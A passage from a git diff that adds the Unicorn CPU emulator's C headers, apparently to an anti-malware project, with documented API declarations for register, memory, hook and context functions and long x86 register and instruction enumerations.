accessed. + + @uc: handle returned by uc_open() + + @return: error code of uc_err enum type (UC_ERR_*, see above) +*/ +UNICORN_EXPORT +uc_err uc_errno(uc_engine *uc); + +/* + Return a string describing given error code. + + @code: error code (see UC_ERR_* above) + + @return: returns a pointer to a string that describes the error code + passed in the argument @code + */ +UNICORN_EXPORT +const char *uc_strerror(uc_err code); + +/* + Write to register. + + @uc: handle returned by uc_open() + @regid: register ID that is to be modified. + @value: pointer to the value that will set to register @regid + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write(uc_engine *uc, int regid, const void *value); + +/* + Read register value. + + @uc: handle returned by uc_open() + @regid: register ID that is to be retrieved. + @value: pointer to a variable storing the register value. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read(uc_engine *uc, int regid, void *value); + +/* + Write multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to store + @value: pointer to array of register values + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_write_batch(uc_engine *uc, int *regs, void *const *vals, int count); + +/* + Read multiple register values. + + @uc: handle returned by uc_open() + @rges: array of register IDs to retrieve + @value: pointer to array of values to hold registers + @count: length of both *regs and *vals + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_reg_read_batch(uc_engine *uc, int *regs, void **vals, int count); + +/* + Write to a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to set. + @bytes: pointer to a variable containing data to be written to memory. + @size: size of memory to write to. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_write(uc_engine *uc, uint64_t address, const void *bytes, size_t size); + +/* + Read a range of bytes in memory. + + @uc: handle returned by uc_open() + @address: starting memory address of bytes to get. + @bytes: pointer to a variable containing data copied from memory. + @size: size of memory to read. + + NOTE: @bytes must be big enough to contain @size bytes. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_read(uc_engine *uc, uint64_t address, void *bytes, size_t size); + +/* + Emulate machine code in a specific duration of time. + + @uc: handle returned by uc_open() + @begin: address where emulation starts + @until: address where emulation stops (i.e when this address is hit) + @timeout: duration to emulate the code (in microseconds). When this value is 0, + we will emulate the code in infinite time, until the code is finished. + @count: the number of instructions to be emulated. When this value is 0, + we will emulate all the code available, until the code is finished. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_start(uc_engine *uc, uint64_t begin, uint64_t until, uint64_t timeout, size_t count); + +/* + Stop emulation (which was started by uc_emu_start() API. + This is typically called from callback functions registered via tracing APIs. + + @uc: handle returned by uc_open() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_emu_stop(uc_engine *uc); + +/* + Register callback for a hook event. + The callback will be run when the hook event is hit. + + @uc: handle returned by uc_open() + @hh: hook handle returned from this registration. To be used in uc_hook_del() API + @type: hook type + @callback: callback to be run when instruction is hit + @user_data: user-defined data. This will be passed to callback function in its + last argument @user_data + @begin: start address of the area where the callback is effect (inclusive) + @end: end address of the area where the callback is effect (inclusive) + NOTE 1: the callback is called only if related address is in range [@begin, @end] + NOTE 2: if @begin > @end, callback is called whenever this hook type is triggered + @...: variable arguments (depending on @type) + NOTE: if @type = UC_HOOK_INSN, this is the instruction ID (ex: UC_X86_INS_OUT) + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_add(uc_engine *uc, uc_hook *hh, int type, void *callback, + void *user_data, uint64_t begin, uint64_t end, ...); + +/* + Unregister (remove) a hook callback. + This API removes the hook callback registered by uc_hook_add(). + NOTE: this should be called only when you no longer want to trace. + After this, @hh is invalid, and nolonger usable. + + @uc: handle returned by uc_open() + @hh: handle returned by uc_hook_add() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_hook_del(uc_engine *uc, uc_hook hh); + +typedef enum uc_prot { + UC_PROT_NONE = 0, + UC_PROT_READ = 1, + UC_PROT_WRITE = 2, + UC_PROT_EXEC = 4, + UC_PROT_ALL = 7, +} uc_prot; + +/* + Map memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Map existing host memory in for emulation. + This API adds a memory region that can be used by emulation. + + @uc: handle returned by uc_open() + @address: starting address of the new memory region to be mapped in. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the new memory region to be mapped in. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: Permissions for the newly mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + @ptr: pointer to host memory backing the newly mapped memory. This host memory is + expected to be an equal or larger size than provided, and be mapped with at + least PROT_READ | PROT_WRITE. If it is not, the resulting behavior is undefined. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_map_ptr(uc_engine *uc, uint64_t address, size_t size, uint32_t perms, void *ptr); + +/* + Unmap a region of emulation memory. + This API deletes a memory mapping from the emulation memory space. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be unmapped. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_unmap(uc_engine *uc, uint64_t address, size_t size); + +/* + Set memory permissions for emulation memory. + This API changes permissions on an existing memory region. + + @uc: handle returned by uc_open() + @address: starting address of the memory region to be modified. + This address must be aligned to 4KB, or this will return with UC_ERR_ARG error. + @size: size of the memory region to be modified. + This size must be multiple of 4KB, or this will return with UC_ERR_ARG error. + @perms: New permissions for the mapped region. + This must be some combination of UC_PROT_READ | UC_PROT_WRITE | UC_PROT_EXEC, + or this will return with UC_ERR_ARG error. + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_protect(uc_engine *uc, uint64_t address, size_t size, uint32_t perms); + +/* + Retrieve all memory regions mapped by uc_mem_map() and uc_mem_map_ptr() + This API allocates memory for @regions, and user must free this memory later + by free() to avoid leaking memory. + NOTE: memory regions may be splitted by uc_mem_unmap() + + @uc: handle returned by uc_open() + @regions: pointer to an array of uc_mem_region struct. This is allocated by + Unicorn, and must be freed by user later with uc_free() + @count: pointer to number of struct uc_mem_region contained in @regions + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_mem_regions(uc_engine *uc, uc_mem_region **regions, uint32_t *count); + +/* + Allocate a region that can be used with uc_context_{save,restore} to perform + quick save/rollback of the CPU context, which includes registers and some + internal metadata. Contexts may not be shared across engine instances with + differing arches or modes. + + @uc: handle returned by uc_open() + @context: pointer to a uc_engine*. This will be updated with the pointer to + the new context on successful return of this function. + Later, this allocated memory must be freed with uc_free(). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_alloc(uc_engine *uc, uc_context **context); + +/* + Free the memory allocated by uc_mem_regions. + WARNING: After Unicorn 1.0.1rc5, the memory allocated by uc_context_alloc should + be free-ed by uc_context_free(). Calling uc_free() may still work, but the result + is **undefined**. + + @mem: memory allocated by uc_mem_regions (returned in *regions). + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_free(void *mem); + +/* + Save a copy of the internal CPU context. + This API should be used to efficiently make or update a saved copy of the + internal CPU state. + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_save(uc_engine *uc, uc_context *context); + +/* + Restore the current CPU context from a saved copy. + This API should be used to roll the CPU context back to a previous + state saved by uc_context_save(). + + @uc: handle returned by uc_open() + @context: handle returned by uc_context_alloc that has been used with uc_context_save + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_restore(uc_engine *uc, uc_context *context); + + +/* + Return the size needed to store the cpu context. Can be used to allocate a buffer + to contain the cpu context and directly call uc_context_save. + + @uc: handle returned by uc_open() + + @return the size for needed to store the cpu context as as size_t. +*/ +UNICORN_EXPORT +size_t uc_context_size(uc_engine *uc); + + +/* + Free the context allocated by uc_context_alloc(). + + @context: handle returned by uc_context_alloc() + + @return UC_ERR_OK on success, or other value on failure (refer to uc_err enum + for detailed error). +*/ +UNICORN_EXPORT +uc_err uc_context_free(uc_context *context); + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/unicorn/include/unicorn/x86.h b/ai_anti_malware/unicorn/include/unicorn/x86.h new file mode 100644 index 0000000..cd2c66d --- /dev/null +++ b/ai_anti_malware/unicorn/include/unicorn/x86.h @@ -0,0 +1,1446 @@ +/* Unicorn Emulator Engine */ +/* By Nguyen Anh Quynh , 2015-2017 */ +/* This file is released under LGPL2. + See COPYING.LGPL2 in root directory for more details +*/ + +#ifndef UNICORN_X86_H +#define UNICORN_X86_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +// Memory-Management Register for instructions IDTR, GDTR, LDTR, TR. +// Borrow from SegmentCache in qemu/target-i386/cpu.h +typedef struct uc_x86_mmr { + uint16_t selector; /* not used by GDTR and IDTR */ + uint64_t base; /* handle 32 or 64 bit CPUs */ + uint32_t limit; + uint32_t flags; /* not used by GDTR and IDTR */ +} uc_x86_mmr; + +// Model-Specific Register structure, use this with UC_X86_REG_MSR (as the register ID) in +// call to uc_reg_write/uc_reg_read() to manipulate MSRs. +typedef struct uc_x86_msr { + uint32_t rid; // MSR id + uint64_t value; // MSR value +} uc_x86_msr; + +// Callback function for tracing SYSCALL/SYSENTER (for uc_hook_intr()) +// @user_data: user data passed to tracing APIs. +typedef void (*uc_cb_insn_syscall_t)(struct uc_struct *uc, void *user_data); + +//> X86 registers +typedef enum uc_x86_reg { + UC_X86_REG_INVALID = 0, + UC_X86_REG_AH, UC_X86_REG_AL, UC_X86_REG_AX, UC_X86_REG_BH, UC_X86_REG_BL, + UC_X86_REG_BP, UC_X86_REG_BPL, UC_X86_REG_BX, UC_X86_REG_CH, UC_X86_REG_CL, + UC_X86_REG_CS, UC_X86_REG_CX, UC_X86_REG_DH, UC_X86_REG_DI, UC_X86_REG_DIL, + UC_X86_REG_DL, UC_X86_REG_DS, UC_X86_REG_DX, UC_X86_REG_EAX, UC_X86_REG_EBP, + UC_X86_REG_EBX, UC_X86_REG_ECX, UC_X86_REG_EDI, UC_X86_REG_EDX, UC_X86_REG_EFLAGS, + UC_X86_REG_EIP, UC_X86_REG_EIZ, UC_X86_REG_ES, UC_X86_REG_ESI, UC_X86_REG_ESP, + UC_X86_REG_FPSW, UC_X86_REG_FS, UC_X86_REG_GS, UC_X86_REG_IP, UC_X86_REG_RAX, + UC_X86_REG_RBP, UC_X86_REG_RBX, UC_X86_REG_RCX, UC_X86_REG_RDI, UC_X86_REG_RDX, + UC_X86_REG_RIP, UC_X86_REG_RIZ, UC_X86_REG_RSI, UC_X86_REG_RSP, UC_X86_REG_SI, + UC_X86_REG_SIL, UC_X86_REG_SP, UC_X86_REG_SPL, UC_X86_REG_SS, UC_X86_REG_CR0, + UC_X86_REG_CR1, UC_X86_REG_CR2, UC_X86_REG_CR3, UC_X86_REG_CR4, UC_X86_REG_CR5, + UC_X86_REG_CR6, UC_X86_REG_CR7, UC_X86_REG_CR8, UC_X86_REG_CR9, UC_X86_REG_CR10, + UC_X86_REG_CR11, UC_X86_REG_CR12, UC_X86_REG_CR13, UC_X86_REG_CR14, UC_X86_REG_CR15, + UC_X86_REG_DR0, UC_X86_REG_DR1, UC_X86_REG_DR2, UC_X86_REG_DR3, UC_X86_REG_DR4, + UC_X86_REG_DR5, UC_X86_REG_DR6, UC_X86_REG_DR7, UC_X86_REG_DR8, UC_X86_REG_DR9, + UC_X86_REG_DR10, UC_X86_REG_DR11, UC_X86_REG_DR12, UC_X86_REG_DR13, UC_X86_REG_DR14, + UC_X86_REG_DR15, UC_X86_REG_FP0, UC_X86_REG_FP1, UC_X86_REG_FP2, UC_X86_REG_FP3, + UC_X86_REG_FP4, UC_X86_REG_FP5, UC_X86_REG_FP6, UC_X86_REG_FP7, + UC_X86_REG_K0, UC_X86_REG_K1, UC_X86_REG_K2, UC_X86_REG_K3, UC_X86_REG_K4, + UC_X86_REG_K5, UC_X86_REG_K6, UC_X86_REG_K7, UC_X86_REG_MM0, UC_X86_REG_MM1, + UC_X86_REG_MM2, UC_X86_REG_MM3, UC_X86_REG_MM4, UC_X86_REG_MM5, UC_X86_REG_MM6, + UC_X86_REG_MM7, UC_X86_REG_R8, UC_X86_REG_R9, UC_X86_REG_R10, UC_X86_REG_R11, + UC_X86_REG_R12, UC_X86_REG_R13, UC_X86_REG_R14, UC_X86_REG_R15, + UC_X86_REG_ST0, UC_X86_REG_ST1, UC_X86_REG_ST2, UC_X86_REG_ST3, + UC_X86_REG_ST4, UC_X86_REG_ST5, UC_X86_REG_ST6, UC_X86_REG_ST7, + UC_X86_REG_XMM0, UC_X86_REG_XMM1, UC_X86_REG_XMM2, UC_X86_REG_XMM3, UC_X86_REG_XMM4, + UC_X86_REG_XMM5, UC_X86_REG_XMM6, UC_X86_REG_XMM7, UC_X86_REG_XMM8, UC_X86_REG_XMM9, + UC_X86_REG_XMM10, UC_X86_REG_XMM11, UC_X86_REG_XMM12, UC_X86_REG_XMM13, UC_X86_REG_XMM14, + UC_X86_REG_XMM15, UC_X86_REG_XMM16, UC_X86_REG_XMM17, UC_X86_REG_XMM18, UC_X86_REG_XMM19, + UC_X86_REG_XMM20, UC_X86_REG_XMM21, UC_X86_REG_XMM22, UC_X86_REG_XMM23, UC_X86_REG_XMM24, + UC_X86_REG_XMM25, UC_X86_REG_XMM26, UC_X86_REG_XMM27, UC_X86_REG_XMM28, UC_X86_REG_XMM29, + UC_X86_REG_XMM30, UC_X86_REG_XMM31, UC_X86_REG_YMM0, UC_X86_REG_YMM1, UC_X86_REG_YMM2, + UC_X86_REG_YMM3, UC_X86_REG_YMM4, UC_X86_REG_YMM5, UC_X86_REG_YMM6, UC_X86_REG_YMM7, + UC_X86_REG_YMM8, UC_X86_REG_YMM9, UC_X86_REG_YMM10, UC_X86_REG_YMM11, UC_X86_REG_YMM12, + UC_X86_REG_YMM13, UC_X86_REG_YMM14, UC_X86_REG_YMM15, UC_X86_REG_YMM16, UC_X86_REG_YMM17, + UC_X86_REG_YMM18, UC_X86_REG_YMM19, UC_X86_REG_YMM20, UC_X86_REG_YMM21, UC_X86_REG_YMM22, + UC_X86_REG_YMM23, UC_X86_REG_YMM24, UC_X86_REG_YMM25, UC_X86_REG_YMM26, UC_X86_REG_YMM27, + UC_X86_REG_YMM28, UC_X86_REG_YMM29, UC_X86_REG_YMM30, UC_X86_REG_YMM31, UC_X86_REG_ZMM0, + UC_X86_REG_ZMM1, UC_X86_REG_ZMM2, UC_X86_REG_ZMM3, UC_X86_REG_ZMM4, UC_X86_REG_ZMM5, + UC_X86_REG_ZMM6, UC_X86_REG_ZMM7, UC_X86_REG_ZMM8, UC_X86_REG_ZMM9, UC_X86_REG_ZMM10, + UC_X86_REG_ZMM11, UC_X86_REG_ZMM12, UC_X86_REG_ZMM13, UC_X86_REG_ZMM14, UC_X86_REG_ZMM15, + UC_X86_REG_ZMM16, UC_X86_REG_ZMM17, UC_X86_REG_ZMM18, UC_X86_REG_ZMM19, UC_X86_REG_ZMM20, + UC_X86_REG_ZMM21, UC_X86_REG_ZMM22, UC_X86_REG_ZMM23, UC_X86_REG_ZMM24, UC_X86_REG_ZMM25, + UC_X86_REG_ZMM26, UC_X86_REG_ZMM27, UC_X86_REG_ZMM28, UC_X86_REG_ZMM29, UC_X86_REG_ZMM30, + UC_X86_REG_ZMM31, UC_X86_REG_R8B, UC_X86_REG_R9B, UC_X86_REG_R10B, UC_X86_REG_R11B, + UC_X86_REG_R12B, UC_X86_REG_R13B, UC_X86_REG_R14B, UC_X86_REG_R15B, UC_X86_REG_R8D, + UC_X86_REG_R9D, UC_X86_REG_R10D, UC_X86_REG_R11D, UC_X86_REG_R12D, UC_X86_REG_R13D, + UC_X86_REG_R14D, UC_X86_REG_R15D, UC_X86_REG_R8W, UC_X86_REG_R9W, UC_X86_REG_R10W, + UC_X86_REG_R11W, UC_X86_REG_R12W, UC_X86_REG_R13W, UC_X86_REG_R14W, UC_X86_REG_R15W, + UC_X86_REG_IDTR, UC_X86_REG_GDTR, UC_X86_REG_LDTR, UC_X86_REG_TR, UC_X86_REG_FPCW, + UC_X86_REG_FPTAG, + UC_X86_REG_MSR, // Model-Specific Register + UC_X86_REG_MXCSR, + UC_X86_REG_FS_BASE, // Base regs for x86_64 + UC_X86_REG_GS_BASE, + UC_X86_REG_ENDING // <-- mark the end of the list of registers +} uc_x86_reg; + +//> X86 instructions +typedef enum uc_x86_insn { + UC_X86_INS_INVALID = 0, + + UC_X86_INS_AAA, + UC_X86_INS_AAD, + UC_X86_INS_AAM, + UC_X86_INS_AAS, + UC_X86_INS_FABS, + UC_X86_INS_ADC, + UC_X86_INS_ADCX, + UC_X86_INS_ADD, + UC_X86_INS_ADDPD, + UC_X86_INS_ADDPS, + UC_X86_INS_ADDSD, + UC_X86_INS_ADDSS, + UC_X86_INS_ADDSUBPD, + UC_X86_INS_ADDSUBPS, + UC_X86_INS_FADD, + UC_X86_INS_FIADD, + UC_X86_INS_FADDP, + UC_X86_INS_ADOX, + UC_X86_INS_AESDECLAST, + UC_X86_INS_AESDEC, + UC_X86_INS_AESENCLAST, + UC_X86_INS_AESENC, + UC_X86_INS_AESIMC, + UC_X86_INS_AESKEYGENASSIST, + UC_X86_INS_AND, + UC_X86_INS_ANDN, + UC_X86_INS_ANDNPD, + UC_X86_INS_ANDNPS, + UC_X86_INS_ANDPD, + UC_X86_INS_ANDPS, + UC_X86_INS_ARPL, + UC_X86_INS_BEXTR, + UC_X86_INS_BLCFILL, + UC_X86_INS_BLCI, + UC_X86_INS_BLCIC, + UC_X86_INS_BLCMSK, + UC_X86_INS_BLCS, + UC_X86_INS_BLENDPD, + UC_X86_INS_BLENDPS, + UC_X86_INS_BLENDVPD, + UC_X86_INS_BLENDVPS, + UC_X86_INS_BLSFILL, + UC_X86_INS_BLSI, + UC_X86_INS_BLSIC, + UC_X86_INS_BLSMSK, + UC_X86_INS_BLSR, + UC_X86_INS_BOUND, + UC_X86_INS_BSF, + UC_X86_INS_BSR, + UC_X86_INS_BSWAP, + UC_X86_INS_BT, + UC_X86_INS_BTC, + UC_X86_INS_BTR, + UC_X86_INS_BTS, + UC_X86_INS_BZHI, + UC_X86_INS_CALL, + UC_X86_INS_CBW, + UC_X86_INS_CDQ, + UC_X86_INS_CDQE, + UC_X86_INS_FCHS, + UC_X86_INS_CLAC, + UC_X86_INS_CLC, + UC_X86_INS_CLD, + UC_X86_INS_CLFLUSH, + UC_X86_INS_CLFLUSHOPT, + UC_X86_INS_CLGI, + UC_X86_INS_CLI, + UC_X86_INS_CLTS, + UC_X86_INS_CLWB, + UC_X86_INS_CMC, + UC_X86_INS_CMOVA, + UC_X86_INS_CMOVAE, + UC_X86_INS_CMOVB, + UC_X86_INS_CMOVBE, + UC_X86_INS_FCMOVBE, + UC_X86_INS_FCMOVB, + UC_X86_INS_CMOVE, + UC_X86_INS_FCMOVE, + UC_X86_INS_CMOVG, + UC_X86_INS_CMOVGE, + UC_X86_INS_CMOVL, + UC_X86_INS_CMOVLE, + UC_X86_INS_FCMOVNBE, + UC_X86_INS_FCMOVNB, + UC_X86_INS_CMOVNE, + UC_X86_INS_FCMOVNE, + UC_X86_INS_CMOVNO, + UC_X86_INS_CMOVNP, + UC_X86_INS_FCMOVNU, + UC_X86_INS_CMOVNS, + UC_X86_INS_CMOVO, + UC_X86_INS_CMOVP, + UC_X86_INS_FCMOVU, + UC_X86_INS_CMOVS, + UC_X86_INS_CMP, + UC_X86_INS_CMPPD, + UC_X86_INS_CMPPS, + UC_X86_INS_CMPSB, + UC_X86_INS_CMPSD, + UC_X86_INS_CMPSQ, + UC_X86_INS_CMPSS, + UC_X86_INS_CMPSW, + UC_X86_INS_CMPXCHG16B, + UC_X86_INS_CMPXCHG, + UC_X86_INS_CMPXCHG8B, + UC_X86_INS_COMISD, + UC_X86_INS_COMISS, + UC_X86_INS_FCOMP, + UC_X86_INS_FCOMPI, + UC_X86_INS_FCOMI, + UC_X86_INS_FCOM, + UC_X86_INS_FCOS, + UC_X86_INS_CPUID, + UC_X86_INS_CQO, + UC_X86_INS_CRC32, + UC_X86_INS_CVTDQ2PD, + UC_X86_INS_CVTDQ2PS, + UC_X86_INS_CVTPD2DQ, + UC_X86_INS_CVTPD2PS, + UC_X86_INS_CVTPS2DQ, + UC_X86_INS_CVTPS2PD, + UC_X86_INS_CVTSD2SI, + UC_X86_INS_CVTSD2SS, + UC_X86_INS_CVTSI2SD, + UC_X86_INS_CVTSI2SS, + UC_X86_INS_CVTSS2SD, + UC_X86_INS_CVTSS2SI, + UC_X86_INS_CVTTPD2DQ, + UC_X86_INS_CVTTPS2DQ, + UC_X86_INS_CVTTSD2SI, + UC_X86_INS_CVTTSS2SI, + UC_X86_INS_CWD, + UC_X86_INS_CWDE, + UC_X86_INS_DAA, + UC_X86_INS_DAS, + UC_X86_INS_DATA16, + UC_X86_INS_DEC, + UC_X86_INS_DIV, + UC_X86_INS_DIVPD, + UC_X86_INS_DIVPS, + UC_X86_INS_FDIVR, + UC_X86_INS_FIDIVR, + UC_X86_INS_FDIVRP, + UC_X86_INS_DIVSD, + UC_X86_INS_DIVSS, + UC_X86_INS_FDIV, + UC_X86_INS_FIDIV, + UC_X86_INS_FDIVP, + UC_X86_INS_DPPD, + UC_X86_INS_DPPS, + UC_X86_INS_RET, + UC_X86_INS_ENCLS, + UC_X86_INS_ENCLU, + UC_X86_INS_ENTER, + UC_X86_INS_EXTRACTPS, + UC_X86_INS_EXTRQ, + UC_X86_INS_F2XM1, + UC_X86_INS_LCALL, + UC_X86_INS_LJMP, + UC_X86_INS_FBLD, + UC_X86_INS_FBSTP, + UC_X86_INS_FCOMPP, + UC_X86_INS_FDECSTP, + UC_X86_INS_FEMMS, + UC_X86_INS_FFREE, + UC_X86_INS_FICOM, + UC_X86_INS_FICOMP, + UC_X86_INS_FINCSTP, + UC_X86_INS_FLDCW, + UC_X86_INS_FLDENV, + UC_X86_INS_FLDL2E, + UC_X86_INS_FLDL2T, + UC_X86_INS_FLDLG2, + UC_X86_INS_FLDLN2, + UC_X86_INS_FLDPI, + UC_X86_INS_FNCLEX, + UC_X86_INS_FNINIT, + UC_X86_INS_FNOP, + UC_X86_INS_FNSTCW, + UC_X86_INS_FNSTSW, + UC_X86_INS_FPATAN, + UC_X86_INS_FPREM, + UC_X86_INS_FPREM1, + UC_X86_INS_FPTAN, + UC_X86_INS_FFREEP, + UC_X86_INS_FRNDINT, + UC_X86_INS_FRSTOR, + UC_X86_INS_FNSAVE, + UC_X86_INS_FSCALE, + UC_X86_INS_FSETPM, + UC_X86_INS_FSINCOS, + UC_X86_INS_FNSTENV, + UC_X86_INS_FXAM, + UC_X86_INS_FXRSTOR, + UC_X86_INS_FXRSTOR64, + UC_X86_INS_FXSAVE, + UC_X86_INS_FXSAVE64, + UC_X86_INS_FXTRACT, + UC_X86_INS_FYL2X, + UC_X86_INS_FYL2XP1, + UC_X86_INS_MOVAPD, + UC_X86_INS_MOVAPS, + UC_X86_INS_ORPD, + UC_X86_INS_ORPS, + UC_X86_INS_VMOVAPD, + UC_X86_INS_VMOVAPS, + UC_X86_INS_XORPD, + UC_X86_INS_XORPS, + UC_X86_INS_GETSEC, + UC_X86_INS_HADDPD, + UC_X86_INS_HADDPS, + UC_X86_INS_HLT, + UC_X86_INS_HSUBPD, + UC_X86_INS_HSUBPS, + UC_X86_INS_IDIV, + UC_X86_INS_FILD, + UC_X86_INS_IMUL, + UC_X86_INS_IN, + UC_X86_INS_INC, + UC_X86_INS_INSB, + UC_X86_INS_INSERTPS, + UC_X86_INS_INSERTQ, + UC_X86_INS_INSD, + UC_X86_INS_INSW, + UC_X86_INS_INT, + UC_X86_INS_INT1, + UC_X86_INS_INT3, + UC_X86_INS_INTO, + UC_X86_INS_INVD, + UC_X86_INS_INVEPT, + UC_X86_INS_INVLPG, + UC_X86_INS_INVLPGA, + UC_X86_INS_INVPCID, + UC_X86_INS_INVVPID, + UC_X86_INS_IRET, + UC_X86_INS_IRETD, + UC_X86_INS_IRETQ, + UC_X86_INS_FISTTP, + UC_X86_INS_FIST, + UC_X86_INS_FISTP, + UC_X86_INS_UCOMISD, + UC_X86_INS_UCOMISS, + UC_X86_INS_VCOMISD, + UC_X86_INS_VCOMISS, + UC_X86_INS_VCVTSD2SS, + UC_X86_INS_VCVTSI2SD, + UC_X86_INS_VCVTSI2SS, + UC_X86_INS_VCVTSS2SD, + UC_X86_INS_VCVTTSD2SI, + UC_X86_INS_VCVTTSD2USI, + UC_X86_INS_VCVTTSS2SI, + UC_X86_INS_VCVTTSS2USI, + UC_X86_INS_VCVTUSI2SD, + UC_X86_INS_VCVTUSI2SS, + UC_X86_INS_VUCOMISD, + UC_X86_INS_VUCOMISS, + UC_X86_INS_JAE, + UC_X86_INS_JA, + UC_X86_INS_JBE, + UC_X86_INS_JB, + UC_X86_INS_JCXZ, + UC_X86_INS_JECXZ, + UC_X86_INS_JE, + UC_X86_INS_JGE, + UC_X86_INS_JG, + UC_X86_INS_JLE, + UC_X86_INS_JL, + UC_X86_INS_JMP, + UC_X86_INS_JNE, + UC_X86_INS_JNO, + UC_X86_INS_JNP, + UC_X86_INS_JNS, + UC_X86_INS_JO, + UC_X86_INS_JP, + UC_X86_INS_JRCXZ, + UC_X86_INS_JS, + UC_X86_INS_KANDB, + UC_X86_INS_KANDD, + UC_X86_INS_KANDNB, + UC_X86_INS_KANDND, + UC_X86_INS_KANDNQ, + UC_X86_INS_KANDNW, + UC_X86_INS_KANDQ, + UC_X86_INS_KANDW, + UC_X86_INS_KMOVB, + UC_X86_INS_KMOVD, + UC_X86_INS_KMOVQ, + UC_X86_INS_KMOVW, + UC_X86_INS_KNOTB, + UC_X86_INS_KNOTD, + UC_X86_INS_KNOTQ, + UC_X86_INS_KNOTW, + UC_X86_INS_KORB, + UC_X86_INS_KORD, + UC_X86_INS_KORQ, + UC_X86_INS_KORTESTB, + UC_X86_INS_KORTESTD, + UC_X86_INS_KORTESTQ, + UC_X86_INS_KORTESTW, + UC_X86_INS_KORW, + UC_X86_INS_KSHIFTLB, + UC_X86_INS_KSHIFTLD, + UC_X86_INS_KSHIFTLQ, + UC_X86_INS_KSHIFTLW, + UC_X86_INS_KSHIFTRB, + UC_X86_INS_KSHIFTRD, + UC_X86_INS_KSHIFTRQ, + UC_X86_INS_KSHIFTRW, + UC_X86_INS_KUNPCKBW, + UC_X86_INS_KXNORB, + UC_X86_INS_KXNORD, + UC_X86_INS_KXNORQ, + UC_X86_INS_KXNORW, + UC_X86_INS_KXORB, + UC_X86_INS_KXORD, + UC_X86_INS_KXORQ, + UC_X86_INS_KXORW, + UC_X86_INS_LAHF, + UC_X86_INS_LAR, + UC_X86_INS_LDDQU, + UC_X86_INS_LDMXCSR, + UC_X86_INS_LDS, + UC_X86_INS_FLDZ, + UC_X86_INS_FLD1, + UC_X86_INS_FLD, + UC_X86_INS_LEA, + UC_X86_INS_LEAVE, + UC_X86_INS_LES, + UC_X86_INS_LFENCE, + UC_X86_INS_LFS, + UC_X86_INS_LGDT, + UC_X86_INS_LGS, + UC_X86_INS_LIDT, + UC_X86_INS_LLDT, + UC_X86_INS_LMSW, + UC_X86_INS_OR, + UC_X86_INS_SUB, + UC_X86_INS_XOR, + UC_X86_INS_LODSB, + UC_X86_INS_LODSD, + UC_X86_INS_LODSQ, + UC_X86_INS_LODSW, + UC_X86_INS_LOOP, + UC_X86_INS_LOOPE, + UC_X86_INS_LOOPNE, + UC_X86_INS_RETF, + UC_X86_INS_RETFQ, + UC_X86_INS_LSL, + UC_X86_INS_LSS, + UC_X86_INS_LTR, + UC_X86_INS_XADD, + UC_X86_INS_LZCNT, + UC_X86_INS_MASKMOVDQU, + UC_X86_INS_MAXPD, + UC_X86_INS_MAXPS, + UC_X86_INS_MAXSD, + UC_X86_INS_MAXSS, + UC_X86_INS_MFENCE, + UC_X86_INS_MINPD, + 